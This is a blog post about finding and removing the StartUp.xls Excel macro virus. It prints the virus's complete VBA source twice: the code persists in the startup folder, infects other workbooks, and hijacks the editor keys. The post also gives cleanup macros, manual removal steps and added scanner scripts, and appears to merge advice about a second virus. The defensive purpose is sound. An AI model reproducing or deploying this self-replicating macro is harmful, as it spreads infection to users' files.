Fixing the Excel virus that self-deletes on Wednesdays: an encounter with the StartUp.xls macro virus
2011-11-10 ok12

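Today a friend asked me to look at a problem: whenever an Excel file was opened and then saved, Excel showed the message "This document contains macros, ActiveX controls, XML expansion pack information, or Web components. These may include personal information that cannot be removed by setting 'Remove personal information from file properties on save' on the Security tab of the Options dialog box (Tools menu)." At first I assumed it was a settings issue; only after several hours of digging did I find that the machine had caught a macro virus named StartUp.xls. Tracking the virus down was a fairly roundabout process (mainly because my own skills are lacking).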


The virus sample is as follows:


Sub auto_open()

    On Error Resume Next

    If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then

        Application.ScreenUpdating = False

        ThisWorkbook.Sheets("StartUp").Copy

        ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")

        n$ = ActiveWorkbook.Name

        ActiveWindow.Visible = False

        Workbooks("StartUp.xls").Save

        Workbooks(n$).Close (False)

    End If

    Application.OnSheetActivate = "StartUp.xls!cop"

    Application.OnKey "%{F11}", "StartUp.xls!escape"

    Application.OnKey "%{F8}", "StartUp.xls!escape"

End Sub

Sub cop()

    On Error Resume Next

    If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then

        Application.ScreenUpdating = False

        n$ = ActiveSheet.Name

        Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)

        Sheets(n$).Select

    End If

End Sub

Sub back()

    On Error Resume Next

    Application.OnKey "%{F8}", "StartUp.xls!escape"

    Application.OnKey "%{F11}", "StartUp.xls!escape"

    Application.OnSheetActivate = "StartUp.xls!cop"

    Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"

    Workbooks.Open Application.StartupPath & "\StartUp.xls"

End Sub


Sub escape()

    On Error Resume Next

    Application.OnSheetActivate = "StartUp.xls!back"

    Application.OnKey "%{F11}"

    Application.OnKey "%{F8}"

    Application.SendKeys "%{F11}"

    Application.SendKeys "%{F8}"

    For Each book In Workbooks

        Application.DisplayAlerts = False

        If book "StartUp.xls" Then book.Sheets("StartUp").Delete

    Next

    For Each book In Workbooks

        If book.Name = "StartUp.xls" Then

            book.Close

        End If

    Next

End Sub
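The listing above persists by saving a copy of itself into the Excel startup folder, spreads through an OnSheetActivate hook that copies its sheet into other workbooks, and rebinds Alt+F11 and Alt+F8 to its own escape routine. The Python scanner below is an added example, not part of the original post: it matches those behaviours in macro source text that has already been extracted from a workbook, and the indicator names and verdict labels are assumptions chosen for illustration.

```python
import re

# Each indicator is a behaviour visible in the StartUp.xls listing above.
INDICATORS = {
    "auto_open": r'^\s*Sub\s+auto_open\s*\(',
    "startup_write": r'SaveAs\s*\(?\s*Application\.StartupPath',
    "activate_hook": r'Application\.OnSheetActivate\s*=\s*"[^"!]+![^"]+"',
    "editor_keys": r'Application\.OnKey\s+"%\{F(?:11|8)\}"\s*,',
    "sheet_copy": r'\.Sheets\("[^"]+"\)\.Copy\s+before\s*:=',
    "silenced": r'On\s+Error\s+Resume\s+Next|DisplayAlerts\s*=\s*False',
}

def scan_macro(source):
    """Return the sorted indicator names that match one module's VBA source."""
    flags = re.IGNORECASE | re.MULTILINE
    return sorted(k for k, p in INDICATORS.items() if re.search(p, source, flags))

def verdict(source):
    """Classify a module: replication needs persistence plus a spreading step."""
    hits = set(scan_macro(source))
    persists = "startup_write" in hits
    spreads = "sheet_copy" in hits or "activate_hook" in hits
    if persists and spreads:
        return "self-replicating"
    if hits - {"silenced"}:
        return "review"
    return "clean"

# Lines quoted from the virus listing above (not the whole macro).
VIRUS_EXCERPT = '''Sub auto_open()
    On Error Resume Next
    ActiveWorkbook.SaveAs (Application.StartupPath & "\\" & "StartUp.xls")
    Application.OnSheetActivate = "StartUp.xls!cop"
    Application.OnKey "%{F11}", "StartUp.xls!escape"
    Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
'''

# Lines quoted from the replacement (cleanup) macro given later in this post.
CLEANER_EXCERPT = '''Sub auto_open()
    On Error Resume Next
    Application.OnSheetActivate = "StartUp.xls!cop"
'''

if __name__ == "__main__":
    for label, src in (("virus", VIRUS_EXCERPT), ("cleaner", CLEANER_EXCERPT)):
        print(label, verdict(src), scan_macro(src))
```

The cleanup macro shares the auto_open and OnSheetActivate indicators with the virus, so it is reported as "review" rather than "clean"; only the startup-folder write separates the two.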


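After consulting some material online, I used the following procedure. It removes the virus, and infected files are also cleaned once they are modified and saved. (Some people online say that cleaning directly with 360 or Kaspersky leaves the files unable to open; I have not tried this and do not know whether it is true.)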


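1. Delete

C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\Excel11.xls

Excel recreates this file automatically after it is deleted.

2. Delete

C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\XLSTART\StartUp.xls

3. Create a new, empty StartUp.xls, then record a macro (any macro will do; this is only so that the VBA editor can be opened).

4. Under Tools -> Macro -> Macros, select the macro you just recorded, choose Edit, select the entire contents, and replace them with the following: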


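Sub auto_open()
    On Error Resume Next
    Application.ScreenUpdating = False
    ActiveWindow.Visible = False
    n$ = ActiveWorkbook.Name
    Workbooks(n$).Close (False)
    ' Run cop() from this StartUp.xls whenever a sheet is activated
    Application.OnSheetActivate = "StartUp.xls!cop"
End Sub

Sub cop()
    On Error Resume Next
    Dim VBC As Object
    Dim Name As String
    Dim delComponent As Object
    'Dim delComponent As VBComponent  Some code posted online includes this line; in testing it causes a compile error. VBA has no VBComponent object
    Name = "StartUp"
    For Each book In Workbooks
        ' The VBA project is exposed as Workbook.VBProject (not VBAProject). Excel must have
        ' "Trust access to Visual Basic Project" enabled, otherwise the error is silently skipped.
        Set delComponent = Nothing
        Set delComponent = book.VBProject.VBComponents(Name)
        If Not delComponent Is Nothing Then book.VBProject.VBComponents.Remove delComponent
    Next
End Sub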


5. Save. Then open an infected document, modify it and save it, and the virus it carries is removed.


 =================================================


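Also:

How to remove the StartUp.xls macro virus

Step 1: Delete StartUp.xls from C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART

Step 2: Delete C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\Excel11.xls. Excel recreates this file itself.

Step 3: Create the file C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART\startup.xls and enter the following code (the code in red below). From then on, opening an infected Excel file automatically removes the virus macro code the file carries.

(Anti-macro-virus code; tested working on 2010.11.18)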


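Sub auto_open()
    On Error Resume Next
    Application.ScreenUpdating = False
    ActiveWindow.Visible = False
    n$ = ActiveWorkbook.Name
    Workbooks(n$).Close (False)
    ' Run cop() from this StartUp.xls whenever a sheet is activated
    Application.OnSheetActivate = "StartUp.xls!cop"
End Sub

Sub cop()
    On Error Resume Next
    Dim VBC As Object
    Dim Name As String
    Dim delComponent As Object
    'Dim delComponent As VBComponent
    Name = "StartUp"
    For Each book In Workbooks
        ' The VBA project is exposed as Workbook.VBProject (not VBAProject). Excel must have
        ' "Trust access to Visual Basic Project" enabled, otherwise the error is silently skipped.
        Set delComponent = Nothing
        Set delComponent = book.VBProject.VBComponents(Name)
        If Not delComponent Is Nothing Then book.VBProject.VBComponents.Remove delComponent
    Next
End Sub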





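(Note: the following is the macro virus code) (Disclaimer: the code below comes from the Internet and is kept purely as a personal hobby collection; it must not be used for illegal purposes! Tested working on 2010.11.18)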



Sub auto_open()  

    On Error Resume Next  

    If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then  

        Application.ScreenUpdating = False  

        ThisWorkbook.Sheets("StartUp").Copy  

        ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")  

        n$ = ActiveWorkbook.Name  

        ActiveWindow.Visible = False  

        Workbooks("StartUp.xls").Save  

        Workbooks(n$).Close (False)  

    End If  

    Application.OnSheetActivate = "StartUp.xls!cop"

    Application.OnKey "%{F11}", "StartUp.xls!escape"

    Application.OnKey "%{F8}", "StartUp.xls!escape"

End Sub  

Sub cop()  

    On Error Resume Next  

    If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then  

        Application.ScreenUpdating = False  

        n$ = ActiveSheet.Name  

        Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)  

        Sheets(n$).Select  

    End If  

End Sub  

Sub back()  

    On Error Resume Next  

    Application.OnKey "%{F8}", "StartUp.xls!escape"

    Application.OnKey "%{F11}", "StartUp.xls!escape"

    Application.OnSheetActivate = "StartUp.xls!cop"

    Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"

    Workbooks.Open Application.StartupPath & "\StartUp.xls"

End Sub  



Sub escape()  

    On Error Resume Next  

    Application.OnSheetActivate = "StartUp.xls!back"

    Application.OnKey "%{F11}"

    Application.OnKey "%{F8}"

    Application.SendKeys "%{F11}"

    Application.SendKeys "%{F8}"

    For Each book In Workbooks  

        Application.DisplayAlerts = False  

        If book "StartUp.xls" Then book.Sheets("StartUp").Delete  

    Next  

    For Each book In Workbooks  

        If book.Name = "StartUp.xls" Then  

            book.Close  

        End If  

    Next  

End Sub


=================================================


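Removal method: if many .xls files are infected, it is best to first download the dedicated removal tool (CleanMacro) and delete all macros from the .xls files on the machine. The tool supports operation from the DOS command line. If the windowed interface reports errors while cleaning, run it from CMD instead.


After all the macros on this machine have been cleaned (if you repost this, please say that it is a repost and respect other people's work!):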


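1. Delete the rpt_pdm2cvs.xls file under C:\Documents and Settings\<username>\Application Data\Microsoft\Excel\xlstart and C:\Program Files\Microsoft Office\OFFICE11\XLSTART (ignore this path if there is no file in it), and create an empty, read-only rpt_pdm2cvs.xls file in its place.


2. Set macro security to High to prevent reinfection (under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\11.0\Excel\Security, change Level in the right-hand pane to 3).


3. Open the originally infected file, press Alt+F11 to open the Visual Basic editor, clear the virus code from the file, remove the copymod module under Modules, and save the file; it is then back to normal.


4. Uninstall Office; it is best to use a tool such as 360 for a complete uninstall that also deletes the related files. Manually delete the registry entries (everything related to Excel must be deleted), the shared configuration files (Common Files\microsoft shared\office*) and the template files (C:\Documents and Settings\<username>\Application Data\Microsoft\Excel, C:\Documents and Settings\<username>\Application Data\Microsoft\office and C:\Program Files\Microsoft Office\OFFICE11). After restarting the computer, install Office 2003, then check again that the macro security setting in the registry is High; it is best to repeat step 2 above.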
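Both procedures above depend on what sits in the XLSTART folders, and Excel opens every workbook it finds there at launch. The Python audit below is an added example, not part of the original post: it walks a profile root, lists every file in any XLSTART folder, and separates the empty read-only placeholder from step 1 from files that still need inspection. The root folder argument and the label names are assumptions.

```python
import os
import stat

# Names the post says to look for in XLSTART; Windows names are case-insensitive.
NAMED_IN_POST = {"startup.xls", "rpt_pdm2cvs.xls"}

def classify(path):
    """Label one file found in an XLSTART folder."""
    info = os.stat(path)
    read_only = not (info.st_mode & stat.S_IWRITE)
    if os.path.basename(path).lower() in NAMED_IN_POST:
        # An empty read-only file is the blocking placeholder from step 1;
        # anything else with these names needs its macros inspected.
        if info.st_size == 0 and read_only:
            return "placeholder"
        return "inspect"
    return "unexpected"

def audit_xlstart(root):
    """Return sorted (relative path, label) for every file in any XLSTART folder.

    Files that are not named in the post are still reported, as 'unexpected',
    because Excel loads them at launch as well.
    """
    findings = []
    for folder, _dirs, files in os.walk(root):
        if os.path.basename(folder).lower() != "xlstart":
            continue
        for name in files:
            path = os.path.join(folder, name)
            findings.append((os.path.relpath(path, root), classify(path)))
    return sorted(findings)

if __name__ == "__main__":
    import sys
    # Assumed default: the Windows XP profile root used in the paths above.
    root = sys.argv[1] if len(sys.argv) > 1 else r"C:\Documents and Settings"
    for rel, label in audit_xlstart(root):
        print(f"{label:12} {rel}")
```

A StartUp.xls that holds the cleanup macro is reported as "inspect", since the script does not read macro contents.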


 


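For the lazy: installing the following removal tool will detect and clean the virus without damaging the original .xls files it infected: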
